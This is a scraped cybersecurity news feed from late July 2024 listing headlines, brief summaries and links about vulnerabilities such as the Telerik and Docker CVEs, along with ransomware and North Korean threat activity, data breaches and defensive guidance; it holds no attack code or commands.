https://www.bleepingcomputer.com/news/security/critical-servicenow-rce-flaws-actively-exploited-to-steal-credentials/

CrowdStrike 'Updates' Deliver Malware & More as Attacks Snowball
The fake updates are part of a phishing and fraud surge that is both more voluminous and more targeted than the usual activity around national news stories.
https://www.darkreading.com/threat-intelligence/crowdstrike-updates-malware-attacks-snowball

Feds Warn of North Korean Cyberattacks on US Critical Infrastructure
The Andariel group is targeting critical defense, aerospace, nuclear, and engineering companies for data theft, the FBI, NSA, and others said.
https://www.darkreading.com/cyberattacks-data-breaches/feds-warn-of-north-korean-cyberattacks-on-us-critical-infrastructure

Progress Software fixed critical RCE CVE-2024-6327 in the Telerik Report Server
Progress Software addressed a critical remote code execution vulnerability, tracked as CVE-2024-6327, in the Telerik Report Server. Telerik Report Server is a web-based application designed for creating, managing, and delivering reports in various formats. It provides tools for report design, scheduling, and secure delivery, allowing organizations to centralize their reporting processes. Progress Software addressed a critical […]
https://securityaffairs.com/166168/security/telerik-report-server-cve-2024-6327.html

From Top Dogs to Unified Pack
Each day often presents a new set of challenges and responsibilities, particularly as organizations accelerate digital transformation efforts. This means you and your cyber team may find yourselves navigating a complex landscape of multi-cloud environments and evolving compliance requirements.
https://blog.rapid7.com/2024/07/25/from-top-dogs-to-unified-pack/

Windows 11 KB5040527 update fixes Windows Backup failures
Microsoft has released the optional KB5040527 preview cumulative update for Windows 11 23H2 and 22H2, which includes fixes for Windows Backup and upgrade failures. [...]
https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5040527-update-fixes-windows-backup-failures/

US offers M for tips on DPRK hacker linked to Maui ransomware attacks
The U.S. State Department is offering a reward of up to million for information that could help capture a North Korean military hacker. [...]
https://www.bleepingcomputer.com/news/security/us-offers-10m-for-tips-on-dprk-hacker-linked-to-maui-ransomware-attacks/

Meta nukes massive Instagram sextortion network of 63,000 accounts
Meta has removed 63,000 Instagram accounts from Nigeria that were involved in sextortion scams, including a coordinated network of 2,500 accounts linked to 20 individuals targeting primarily adult men in the United States. [...]
https://www.bleepingcomputer.com/news/security/meta-nukes-massive-instagram-sextortion-network-of-63-000-accounts/

Researchers Claim Anyone Can Access Deleted, Private GitHub Repository Data
Cybersecurity researchers have revealed a GitHub design flaw that allows access to deleted and private repository data. Learn…
https://hackread.com/anyone-access-deleted-private-github-repository-data/

Windows update may present users with a BitLocker recovery screen
After the July Microsoft update some systems boot into a BitLocker Recovery screen. How can you find the key you need?
https://www.malwarebytes.com/blog/news/2024/07/windows-update-may-present-users-with-a-bitlocker-recovery-screen

Onyx Sleet uses array of malware to gather intelligence for North Korea
On July 25, 2024, the United States Department of Justice (DOJ) indicted an individual linked to the North Korean threat actor that Microsoft tracks as Onyx Sleet. Microsoft Threat Intelligence collaborated with the Federal Bureau of Investigation (FBI) in tracking activity associated with Onyx Sleet. We will continue to closely monitor Onyx Sleet's activity to assess changes following the indictment. The post Onyx Sleet uses array of malware to gather intelligence for North Korea appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/07/25/onyx-sleet-uses-array-of-malware-to-gather-intelligence-for-north-korea/

Progress warns of critical RCE bug in Telerik Report Server
Progress Software has warned customers to patch a critical remote code execution security flaw in the Telerik Report Server that can be used to compromise vulnerable devices. [...]
https://www.bleepingcomputer.com/news/security/progress-warns-of-critical-rce-bug-in-telerik-report-server/

Critical bug in Docker Engine allowed attackers to bypass authorization plugins
A critical flaw in some versions of Docker Engine can be exploited to bypass authorization plugins (AuthZ) under specific circumstances. A vulnerability, tracked as CVE-2024-41110 (CVSS score of 10.0), in certain versions of Docker Engine can allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. “An attacker could exploit a bypass using an API request with […]
https://securityaffairs.com/166160/hacking/docker-engine-critical-flaw.html

Chinese SMS Phishing Group Hits iPhone Users in India Post Scam
The notorious Chinese Smishing Triad gang, known for its SMS phishing attacks against Pakistan, the US, and European…
https://hackread.com/chinese-sms-phishing-group-iphone-users-india-post-scam/

North Korean Hackers Shift from Cyber Espionage to Ransomware Attacks
A North Korea-linked threat actor known for its cyber espionage operations has gradually expanded into financially-motivated attacks that involve the deployment of ransomware, setting it apart from other nation-state hacking groups linked to the country. Google-owned Mandiant is tracking the activity cluster under a new moniker APT45, which overlaps with names such as Andariel, Nickel Hyatt,
https://thehackernews.com/2024/07/north-korean-hackers-shift-from-cyber.html

Nexo Cements User Data Security with SOC 3 Assessment and SOC 2 Audit Renewal
Nexo’s SOC 2 Type II reassessment and new SOC 3 report is the latest step in the organization's…
https://hackread.com/nexo-cements-user-data-security-soc-3-soc-2-audit-renewal/

RA Ransomware Group Aggressively Attacking Manufacturing Sector
RA World, an emerging ransomware group, has been increasingly active since March 2024, using a multi-extortion tactic to steal data and threaten to leak it if the ransom is not paid.  Their leak site shows a recent shift in targets from healthcare organizations to manufacturing, possibly due to seeking higher ransom payouts, but the reason […] The post RA Ransomware Group Aggressively Attacking Manufacturing Sector appeared first on Cyber Security News.
https://cybersecuritynews.com/ra-ransomware-attacks-manufacturing/

Vigorish Viper, An Advanced Suite for Cybercrime Supply Chain
Hackers make use of the cybercrime supply chain for a multitude of illicit purposes, such as acquiring and distributing malicious tools, services, and stolen data. This collaboration lets them execute more sophisticated and widespread attacks by enabling them to specialize in specific aspects of cybercrime, enhance their capabilities, and scale their operations. Infoblox researchers recently […] The post Vigorish Viper, An Advanced Suite for Cybercrime Supply Chain appeared first on Cyber Security News.
https://cybersecuritynews.com/vigorish-viper-cybercrime-suite/

Buying Stuff For Free From Shopping Websites
Rapid7 is often tasked with evaluating the security of e-commerce sites. When dealing directly with customer financials, the security of these transactions is a top concern. Fortunately, there are ample pre-built e-commerce platforms one can simply purchase or install.
https://blog.rapid7.com/2024/07/25/buying-stuff-for-free-from-shopping-websites/

Cyber insurance guidance
Cyber security considerations for organisations thinking about taking out cyber insurance.
https://www.ncsc.gov.uk/guidance/cyber-insurance-guidance

Unveiling the latest banking trojan threats in LATAM
This post was made possible through the research contributions of Amir Gendler. In our most recent research in the Latin American (LATAM) region, we at IBM Security Lab have observed a surge in campaigns linked with malicious Chrome extensions. These campaigns primarily target Latin America, with a particular emphasis on its financial institutions. In this […] The post Unveiling the latest banking trojan threats in LATAM appeared first on Security Intelligence.
https://securityintelligence.com/posts/unveiling-latest-banking-trojan-threats-latam/

Infosec Analyst Jobs: Six-Figure Salaries
This week in cybersecurity from the editors at Cybercrime Magazine. Read the Full Story in Fortune. Sausalito, Calif. – Jul. 25, 2024. The bad news is that there is currently a major shortage of cybersecurity professionals; around 3.5 million cybersecurity professionals are needed globally to properly The post Infosec Analyst Jobs: Six-Figure Salaries appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/infosec-analyst-jobs-six-figure-salaries/

Deep Dive: Unveiling the Untold Challenges of Single Sign-On (SSO) Management
Single Sign-On (SSO) serves as the linchpin connecting corporate networks, facilitating seamless access to various web applications without the need for repeated login credentials. However, there are several untold challenges... The post Deep Dive: Unveiling the Untold Challenges of Single Sign-On (SSO) Management appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/deep-dive-unveiling-the-untold-challenges-of-single-sign-on-sso-management/

The Importance of Ethical Hacking in Cybersecurity
In an era where digital threats loom large over individuals and organizations alike, cybersecurity has… The Importance of Ethical Hacking in Cybersecurity on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/25/the-importance-of-ethical-hacking-in-cybersecurity/

The Essential Guide to Total Protection in Microsoft 365
Businesses across the globe are increasingly adopting cloud-based services to optimize operations, boost productivity, and… The Essential Guide to Total Protection in Microsoft 365 on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/25/the-essential-guide-to-total-protection-in-microsoft-365/

Artificial Intelligence: 'call for views' on the cyber security of AI closes soon
Businesses, academia and international partners invited to respond to the UK government's ‘call for views' on the security of AI.
https://www.ncsc.gov.uk/blog-post/ai-cyber-security-call-closes-soon

6 Types of Applications Security Testing You Must Know About
Application security testing is a critical component of modern software development, ensuring that applications are robust and resilient against malicious attacks. As cyber threats continue to evolve in complexity and frequency, the need to integrate comprehensive security measures throughout the SDLC has never been more essential. Traditional pentesting provides a crucial snapshot of an
https://thehackernews.com/2024/07/6-types-of-applications-security.html

Huge Increase in Scanning for CVE-2017-9841 With Large Variability in Scanning Infrastructure
The rather old CVE-2017-9841, an RCE in PHPUnit, suddenly jumps to the top of our list, with an increase of nearly 400% since last month. We dig into the scanning infrastructure.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-june-2024

Hackers exploit Microsoft Defender SmartScreen bug CVE-2024-21412 to deliver ACR, Lumma, and Meduza Stealers
The CVE-2024-21412 flaw in Microsoft Defender SmartScreen has been exploited to deliver information stealers such as ACR Stealer, Lumma, and Meduza. Fortinet FortiGuard Labs researchers observed a malware campaign exploiting the vulnerability CVE-2024-21412 (CVSS score: 8.1) to spread information stealers such as ACR Stealer, Lumma, and Meduza. CVE-2024-21412 is an Internet Shortcut Files Security Feature Bypass Vulnerability. The flaw […]
https://securityaffairs.com/166152/security/cve-2024-21412-flaw-info-stealers.html

Meta Removes 63,000 Instagram Accounts Linked to Nigerian Sextortion Scams
Meta Platforms on Wednesday said it took steps to remove around 63,000 Instagram accounts in Nigeria that were found to target people with financial sextortion scams. "These included a smaller coordinated network of around 2,500 accounts that we were able to link to a group of around 20 individuals," the company said. "They targeted primarily adult men in the U.S. and used fake accounts to mask
https://thehackernews.com/2024/07/meta-removes-63000-instagram-accounts.html

AI Tool Identifies BOLA Vulnerabilities in Easy!Appointments
We explain how an automated BOLA detection tool harnessing GenAI discovered multiple BOLA vulnerabilities in open-source scheduling tool Easy!Appointments. The post AI Tool Identifies BOLA Vulnerabilities in Easy!Appointments appeared first on Unit 42.
https://unit42.paloaltonetworks.com/bola-vulnerabilities-easyappointments/

Webinar: Securing the Modern Workspace: What Enterprises MUST Know about Enterprise Browser Security
The browser is the nerve center of the modern workspace. Ironically, however, the browser is also one of the least protected threat surfaces of the modern enterprise. Traditional security tools provide little protection against browser-based threats, leaving organizations exposed. Modern cybersecurity requires a new approach based on the protection of the browser itself, which offers both
https://thehackernews.com/2024/07/webinar-securing-modern-workspace-what.html

Condo.com - 1,481,555 breached accounts
In June 2019, now defunct website Condo.com suffered a data breach that was later redistributed as part of a larger corpus of data. The impacted data included 1.5M email addresses alongside names, phone numbers and for a small number of records, physical addresses.
https://haveibeenpwned.com/PwnedWebsites#CondoCom

Threat Actors leveraging the recent CrowdStrike update outage
What is the Threat? FortiGuard Labs is aware of the campaigns used by threat actors to spread malware, using phishing and scams to take advantage of the recent widespread global IT outage affecting Microsoft Windows hosts. This outage is due to an issue with a recent CrowdStrike update that can cause a bug check or Blue Screen of Death (BSOD) on the affected Windows machines, which may get stuck in a restarting state. Why is it significant? The outage has brought many businesses' operations to a halt worldwide across a variety of industries, including hospitals, banks, stock exchanges, and other institutions, as some Microsoft-based computers ceased to work. The threat actors have taken advantage of such events to spread malware, use phishing, and attempt other scams. What is the recommended mitigation? FortiGuard...
https://fortiguard.fortinet.com/threat-signal-report/5496

Explore Talent - 5,371,574 breached accounts
In July 2024, a data breach attributed to Explore Talent was publicly posted to a popular hacking forum. Containing 5.7M rows with 5.4M unique email addresses, the incident has been described by various sources as occurring between early 2022 to 2023 and also contains names, phone numbers and physical addresses.
https://haveibeenpwned.com/PwnedWebsites#ExploreTalent

Cybersecurity Firm KnowBe4 Tricked into Hiring North Korean Hacker as IT Pro
Cybersecurity firm KnowBe4 was tricked by a North Korean hacker posing as an IT worker whose next step…
https://hackread.com/cybersecurity-firm-knowbe4-hire-north-korean-hacker/

Python for Penetration Testing: Automating Cybersecurity with Python
Harnessing the Power of Python to Strengthen Cyber Defenses and Streamline Penetration Testing Workflows. Python has become a staple language in the world of cybersecurity, particularly in the domain of penetration testing. Penetration testing, often referred to as ethical hacking, involves simulating cyber attacks to identify vulnerabilities in systems, networks, and applications before malicious actors can exploit them. Python's simplicity, versatility, and extensive libraries make it an ideal choice for developing custom penetration testing tools and automating various phases of the testing process. In this article, we'll explore how Python is used in penetration testing tools and frameworks like Metasploit, Nmap, and Scapy. We'll delve into scripting...
https://infosecwriteups.com/python-for-penetration-testing-automating-cybersecurity-with-python-f9ea2165852a?source=rss----7b722bfd1b8d---4

Michigan Medicine data breach impacted 56953 patients
A cyber attack against Michigan Medicine resulted in the compromise of the personal and health information of approximately 57,000 patients. The academic medical center of the University of Michigan, Michigan Medicine, suffered a data breach that impacted 56953 patients. The security incident exposed the personal and health information of the patients. Michigan Medicine notified patients […]
https://securityaffairs.com/166138/cyber-crime/michigan-medicine-data-breach.html

News from previous days

China-Backed Phishing Attack Targets India Postal System Users
A large text-message phishing attack campaign attributed to the China-based Smishing Triad employs malicious iMessages.
https://www.darkreading.com/endpoint-security/china-backed-smishing-campaign-targets-india-post-users

HIPAA and Pentesting: What You Need to Know
Learn how to maintain compliance with HIPAA security standards through pentesting.
https://www.hackerone.com/security-compliance/hipaa-pentesting

U.S. CISA adds Microsoft Internet Explorer and Twilio Authy bugs to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Internet Explorer and Twilio Authy bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Below are the descriptions of the flaws added to the KEV catalog: CVE-2012-4792 (CVSS score of […]
https://securityaffairs.com/166126/breaking-news/u-s-cisa-adds-microsoft-internet-explorer-and-twilio-authy-bugs-known-exploited-vulnerabilities-catalog.html

USN-6915-1: poppler vulnerability
It was discovered that poppler incorrectly handled certain malformed PDF files. An attacker could possibly use this issue to cause a denial of service.
https://ubuntu.com/security/notices/USN-6915-1

USN-6914-1: OCS Inventory vulnerability
Filip Hejsek discovered that the phpCAS library included in OCS Inventory was using HTTP headers to determine the service URL used to validate tickets. A remote attacker could possibly use this issue to gain access to a victim's account.
https://ubuntu.com/security/notices/USN-6914-1

USN-6913-1: phpCAS vulnerability
Filip Hejsek discovered that phpCAS was using HTTP headers to determine the service URL used to validate tickets. A remote attacker could possibly use this issue to gain access to a victim's account on a vulnerable CASified service. This security update introduces an incompatible API change. After applying this update, third party applications need to be modified to pass in an additional service base URL argument when constructing the client class. For more information please refer to the section "Upgrading 1.5.0 -> 1.6.0" of the phpCAS upgrading document: https://github.com/apereo/phpCAS/blob/master/docs/Upgrading
https://ubuntu.com/security/notices/USN-6913-1

TracFone will pay $16 million to settle FCC data breach investigation
Prepaid wireless provider TracFone has been slapped on the wrist to the tune of $16 million for insufficient customer data protection.
https://www.malwarebytes.com/blog/news/2024/07/tracfone-will-pay-16-million-to-settle-fcc-data-breach-investigation

Hack My Career: Meet Naz Bozdemir

https://www.hackerone.com/culture-and-talent/hack-my-career-meet-naz-bozdemir

Zero Trust in the Age of AI: Join our online event to learn how to strengthen your security posture
Register for the “Zero Trust in the Age of AI” webcast to learn more about how our new capabilities in identity and network access and security operations make it easier to implement Zero Trust across your entire environment. The post Zero Trust in the Age of AI: Join our online event to learn how to strengthen your security posture appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/07/24/zero-trust-in-the-age-of-ai-join-our-online-event-to-learn-how-to-strengthen-your-security-posture/

Indian Firm Linked to Fake DMCA Notices Silencing Journalists
Is critical journalism under attack? A recent exposé reveals a disturbing trend: Companies, in this case, an Indian…
https://hackread.com/fake-dmca-requests-threaten-investigative-journalism/

Cybercrime Surges. Humans Are Still The Weakest Link.
This week in cybersecurity from the editors at Cybercrime Magazine – Read the Full Story in The CEO Magazine. Sausalito, Calif. – Jul. 24, 2024. Cybercrime expert Foo Siang-tse is under no illusions as to the size of the challenge ahead for global businesses as the… The post Cybercrime Surges. Humans Are Still The Weakest Link. appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybercrime-surges-humans-are-still-the-weakest-link/

Malware Campaign Lures Users With Fake W2 Form
Rapid7 has recently observed an ongoing campaign targeting users searching for W2 forms using the Microsoft search engine Bing.
https://blog.rapid7.com/2024/07/24/malware-campaign-lures-users-with-fake-w2-form/

Crisis communication: What NOT to do
Read the first blog in this series: Cybersecurity crisis communication: What to do. When an organization experiences a cyberattack, tensions are high, customers are concerned and the business is typically not operating at full capacity. Every move you make at this point makes a difference to your company's future, and even a seemingly small mistake can […] The post Crisis communication: What NOT to do appeared first on Security Intelligence.
https://securityintelligence.com/articles/crisis-communication-what-not-to-do/

How the Newest Tech Changes Cybersecurity Needs in the Legal Industry
Responsibly Adopting Technology to Improve Law Firm Productivity Lawyers face incredible pressure in their jobs to perform accurately and quickly. Thankfully, technology has been introduced that now allows legal professionals... The post How the Newest Tech Changes Cybersecurity Needs in the Legal Industry appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/how-the-newest-tech-changes-cybersecurity-needs-in-the-legal-industry/

New legislation will help counter the cyber threat to our essential services
The announcement of the Cyber Security and Resilience Bill is a landmark moment in tackling the growing threat to the UK's critical systems.
https://www.ncsc.gov.uk/blog-post/legislation-help-counter-cyber-threat-cni

Exim 4.98 Addresses Critical Vulnerabilities, Bolsters Email Server Security
Exim is one of the most widely used mail transfer agents on Unix-like systems. It is essential for email delivery and handling and is a significant part of the Internet email infrastructure.
https://linuxsecurity.com/news/security-vulnerabilities/exim-4-98-addresses-critical-security-bugs

Windows SmartScreen Flaw Enabling Data Theft in Major Stealer Attack
New Stealer Campaign Exploits Windows SmartScreen Vulnerability (CVE-2024-21412) – This large-scale attack targets Windows users, stealing passwords, browsing…
https://hackread.com/windows-smartscreen-flaw-data-theft-stealer-attack/

China-linked APT group uses new Macma macOS backdoor version
The China-linked APT group Daggerfly (aka Evasive Panda, Bronze Highland) has been spotted using an updated version of the macOS backdoor Macma. The group has significantly updated its malware arsenal, adding a new malware family based on the MgBot framework and an updated Macma macOS backdoor. […]
https://securityaffairs.com/166102/apt/daggerfly-macma-macos-backdoor.html

Accelerating Analysis When It Matters
Malware analysts demonstrate how to triage and analyze large amounts of samples with greater efficiency. Samples include Remcos RAT, Lumma Stealer and more. The post Accelerating Analysis When It Matters appeared first on Unit 42.
https://unit42.paloaltonetworks.com/accelerating-malware-analysis/

USN-6912-1: provd vulnerability
James Henstridge discovered that provd incorrectly handled environment variables. A local attacker could possibly use this issue to run arbitrary programs and escalate privileges.
https://ubuntu.com/security/notices/USN-6912-1

USN-6906-1: python-zipp vulnerability
It was discovered that python-zipp did not properly handle zip files with malformed names. An attacker could possibly use this issue to cause a denial of service.
https://ubuntu.com/security/notices/USN-6906-1

Navigating Australian ISM Guidelines for Software Development
In 2017, the Australian Cyber Security Centre (ACSC), a division of the Australian Signals Directorate (ASD), released the Information Security Manual (ISM). This comprehensive guide offers practical advice on safeguarding systems and data.
https://www.sonatype.com/blog/navigating-australian-ism-guidelines-for-software-development

Adding a Twist to the Epic of Vulnerability Management
Originally published by CXO REvolutionaries. Written by Sam Curry, VP & CISO in Residence, Zscaler. “History doesn't repeat itself, but it often rhymes.” – Mark Twain. We are in our fourth decade since the Security Administrator Tool for Analyzing Networks (SATAN) hit the scene and we have to ask ourselves, “Why is it still so hard to effectively patch systems?” To be fair, the landscape hasn't exactly stayed the same: the adversaries, defensive tools, even the way we define vulnerabilities and...
https://cloudsecurityalliance.org/articles/adding-a-twist-to-the-epic-of-vulnerability-management

FrostyGoop ICS malware targets Ukraine
In April 2024, Dragos researchers spotted the malware FrostyGoop, which interacts with Industrial Control Systems (ICS) using the Modbus protocol. In April 2024, Dragos researchers discovered a new ICS malware named FrostyGoop that interacts with Industrial Control Systems using the Modbus protocol. FrostyGoop is the ninth ICS malware that was discovered and that a nation-state […]
https://securityaffairs.com/166087/malware/frostygoop-ics-malware-modbus.html

Custom Inbox Enhancements: Revolutionizing Vulnerability Management for Enterprises
HackerOne's Custom Inboxes Enhancements provide flexible report segmentation, reduce administrative overhead, and mitigate security risks.
https://www.hackerone.com/vulnerability-management/custom-inbox-enhancements

USN-6910-1: Apache ActiveMQ vulnerabilities
Chess Hazlett discovered that Apache ActiveMQ incorrectly handled certain commands. A remote attacker could possibly use this issue to terminate the program, resulting in a denial of service. This issue only affected Ubuntu 16.04 LTS. (CVE-2015-7559) Peter Stöckli discovered that Apache ActiveMQ incorrectly handled hostname verification. A remote attacker could possibly use this issue to perform a person-in-the-middle attack. This issue only affected Ubuntu 16.04 LTS. (CVE-2018-11775) Jonathan Gallimore and Colm Ó hÉigeartaigh discovered that Apache ActiveMQ incorrectly handled authentication in certain functions. A remote attacker could possibly use this issue to perform a person-in-the-middle attack. This issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. (CVE-2020-13920) Gregor...
https://ubuntu.com/security/notices/USN-6910-1

Phish-Friendly Domain Registry “.top” Put on Notice
The Chinese company in charge of handing out domain names ending in “.top” has been given until mid-August 2024 to show that it has put in place systems for managing phishing reports and suspending abusive domains, or else forfeit its license to sell domains. The warning comes amid the release of new findings that .top was the most common suffix in phishing websites over the past year, second only to domains ending in “.com.”
https://krebsonsecurity.com/2024/07/phish-friendly-domain-registry-top-put-on-notice/

Play Ransomware Variant Targeting Linux ESXi Environments
Play Ransomware Targets Linux! New Variant Attacks ESXi with Prolific Puma Ties. Learn how to protect your organization…
https://hackread.com/play-ransomware-target-linux-esxi-environments/

USN-6530-2: HAProxy vulnerability
Seth Manesse and Paul Plasil discovered that HAProxy incorrectly handled URI components containing the hash character (#). A remote attacker could possibly use this issue to obtain sensitive information, or to bypass certain path_end rules.
https://ubuntu.com/security/notices/USN-6530-2

Cloud Security Alliance Issues Artificial Intelligence (AI) Model Risk Management Framework
Paper emphasizes the importance of model risk management (MRM) for harnessing the full potential of AI and machine learning (ML) models. SEATTLE – July 24, 2024 – The latest set of AI guidance from the Cloud Security Alliance (CSA), the world's leading organization dedicated to defining standards, certifications, and best practices to help ensure a secure cloud computing environment, explores the importance of Model Risk Management (MRM) in ensuring the responsible development, deployment, and use of A...
https://cloudsecurityalliance.org/articles/cloud-security-alliance-issues-ai-model-risk-management-framework

Google admits it can’t quite quit third-party cookies
Google has taken a new turn in the approach to eliminating third-party cookies. This time it's back to the Privacy Sandbox
https://www.malwarebytes.com/blog/news/2024/07/google-admits-it-cant-quite-quit-third-party-cookies

Mexico's Largest ERP Provider ClickBalance Exposes 769 Million Records
ClickBalance ERP provider’s cloud database exposed 769 million records, including API keys and email addresses. Learn how this…
https://hackread.com/mexico-erp-clickbalance-769-million-records-data-leak/

July 2024: National Make A Difference To Children Month
This week in cybersecurity from the editors at Cybercrime Magazine – Listen to the Cybercrime Magazine Podcast Interview. Sausalito, Calif. – Jul. 23, 2024. There's something important for everyone to know in July 2024, which is “National Make A Difference To Children Month”: It can… The post July 2024: National Make A Difference To Children Month appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/july-2024-national-make-a-difference-to-children-month/

5 Reasons IGA Programs Fail
Identity governance and administration (IGA) is a critical part of modern business. It's one of the single most important pieces of creating and balancing a productive and secure work environment.... The post 5 Reasons IGA Programs Fail appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/5-reasons-iga-programs-fail/

Building cyber-resilience: Lessons learned from the CrowdStrike incident
Organizations, including those that weren't struck by the CrowdStrike incident, should resist the temptation to attribute the IT meltdown to exceptional circumstances
https://www.welivesecurity.com/en/cybersecurity/building-cyber-resilience-lessons-learned-crowdstrike-incident/

Vulnerabilities in LangChain Gen AI
This article is a detailed study of CVE-2023-46229 and CVE-2023-44467, two vulnerabilities discovered by our researchers affecting generative AI framework LangChain. The post Vulnerabilities in LangChain Gen AI appeared first on Unit 42.
https://unit42.paloaltonetworks.com/langchain-vulnerabilities/

1-15 April 2024 Cyber Attacks Timeline
In the first timeline of April 2024 I collected 107 events (7.13 events/day), as always characterized by a majority of malware attacks.
https://www.hackmageddon.com/2024/07/23/1-15-april-2024-cyber-attacks-timeline/

The tap-estry of threats targeting Hamster Kombat players
ESET researchers have discovered threats abusing the success of the Hamster Kombat clicker game
https://www.welivesecurity.com/en/eset-research/tap-estry-threats-targeting-hamster-kombat-players/

How to Enhance Your System's Security with Master Data Governance
Data security has always been a priority. Thanks to AI and machine learning's massive boost… How to Enhance Your System's Security with Master Data Governance on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/23/how-to-enhance-your-systems-security-with-master-data-governance/

Need a Penetration Test? Here's What to Do Next
Originally published by Schellman. In our experience, there are typically three reasons why you may move forward with a penetration test and start looking around for a provider. Making that initial decision to move forward with an assessment like this is a big step, but what should you do after you make it? If you fall into any of the following common scenarios that mandate a pen test, here are the immediate next steps to take for each one: You want to proactively improve your cybersecurity. Yo...
https://cloudsecurityalliance.org/articles/need-a-penetration-test-here-s-what-to-do-next

The First 10 Days of a vCISO's Journey with a New Client
“In a quaint village nestled between rolling hills and dense forests, a young apprentice named Eli was learning to throw pottery from a master potter. On the first day by... The post The First 10 Days of a vCISO's Journey with a New Client appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/the-first-10-days-of-a-vcisos-journey-with-a-new-client/

In a Cloudy World, On-Premises Still Might be The Way To Go
Here are four reasons why an on-premises deployment might be the right choice for your organization. – Stephen Salinas, Head of Product Marketing, Stellar Cyber San Jose, Calif. – Jul. 22, 2024 In 2012, I worked for one of the first vendors to deliver security-as-a-service. The post In a Cloudy World, On-Premises Still Might be The Way To Go appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/in-a-cloudy-world-on-premises-still-might-be-the-way-to-go/

Stellar Cyber July
Here are four reasons why an on-premises deployment might be the right choice for your organization. – Stephen Salinas, Head of Product Marketing, Stellar Cyber San Jose, Calif. – Jul. 22, 2024 In 2012, I worked for one of the first vendors to deliver security-as-a-service. The post Stellar Cyber July appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/stellar-cyber-july/

Multiple Vulnerabilities Found In XenForo Internet Forum Solution
Numerous security vulnerabilities riddled the XenForo Internet Forum solution, one of which could even allow… Multiple Vulnerabilities Found In XenForo Internet Forum Solution on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/22/multiple-vulnerabilities-found-in-xenforo-internet-forum-solution/

Issue with AWS Client VPN - CVE-2024-30164, CVE-2024-30165
Publication Date: 2024/07/16 3:30 PM PDT AWS is aware of CVE-2024-30164 and CVE-2024-30165 in AWS Client VPN. These issues could potentially allow an actor with access to an end user's device to escalate to root privilege and execute arbitrary commands on that device. We addressed these issues on all platforms. Customers using AWS Client VPN should upgrade to version 3.11.1 or higher for Windows, 3.9.2 or higher for MacOS, and 3.12.1 or higher for Linux. For additional information on configuring AWS Client VPN to meet your security and compliance requirements, please refer to our "Security in AWS Client VPN" user guide. We would like to thank Robinhood for collaborating on this issue through the coordinated vulnerability disclosure process. Security-related questions...
https://aws.amazon.com/security/security-bulletins/AWS-2024-008/

Issue with PyTorch TorchServe - CVE-2024-35198, CVE-2024-35199
Publication Date: 2024/07/18 2:50 PM PDT AWS is aware of the issues described in CVE-2024-35198 and CVE-2024-35199 in PyTorch TorchServe versions 0.3.0 to 0.10.0. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker are not affected. CVE-2024-35198: TorchServe does not prevent a model from being downloaded into the model store if the URL contains characters such as ".." when the TorchServe model registration API is called. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker and Amazon Elastic Kubernetes Service (Amazon EKS) are not affected by this issue. CVE-2024-35199: TorchServe does not bind the two gRPC ports 7070 and 7071 to localhost by default. These two interfaces are bound to all interfaces when TorchServe is natively launched...
https://aws.amazon.com/security/security-bulletins/AWS-2024-009/

'Smart' security cameras: Using them safely in your home
How to protect 'smart' security cameras and baby monitors from cyber attack.
https://www.ncsc.gov.uk/guidance/smart-security-cameras-using-them-safely-in-your-home

Mitigating malware and ransomware attacks
How to defend organisations against malware or ransomware attacks
https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks

Cyber security for major events
Assessing the cyber security needs of major events.
https://www.ncsc.gov.uk/guidance/cyber-security-for-major-events

Heritage Foundation data breach containing personal data is available online
Data from the Heritage Foundation containing at least half a million usernames and passwords is available online.
https://www.malwarebytes.com/blog/news/2024/07/heritage-foundation-data-breach-containing-personal-data-is-available-online

Protecting SMS messages used in critical business processes
Security advice for organisations using text messages to communicate with end users
https://www.ncsc.gov.uk/guidance/protecting-sms-messages-used-in-critical-business-processes

Online gaming for families and individuals
How to enjoy online gaming securely by following just a few tips
https://www.ncsc.gov.uk/guidance/online-gaming-for-families-and-individuals

Social Media: how to use it safely
Use privacy settings across social media platforms to manage your digital footprint.
https://www.ncsc.gov.uk/guidance/social-media-how-to-use-it-safely

Introduction to identity and access management
This guidance provides a primer on the essential techniques, technologies and uses of access management.
https://www.ncsc.gov.uk/guidance/introduction-identity-and-access-management

Using TLS to protect data
Recommended profiles to securely configure TLS for the most common versions and scenarios, with additional guidance for managing older versions.
https://www.ncsc.gov.uk/guidance/using-tls-to-protect-data

Boris Karloff Is A Cybersecurity Expert's Best Friend
This week in cybersecurity from the editors at Cybercrime Magazine – Watch the Cybercrime Magazine video. Sausalito, Calif. – Jul. 22, 2024. Sherrod DeGrippo, director, threat intelligence, at Microsoft, is a regular guest and fan favorite on the Cybercrime Magazine Podcast. Her best friend, and… The post Boris Karloff Is A Cybersecurity Expert's Best Friend appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/boris-karloff-is-a-cybersecurity-experts-best-friend/

Pioneering the New Frontier in AI Consumer Protection and Cyber Defense
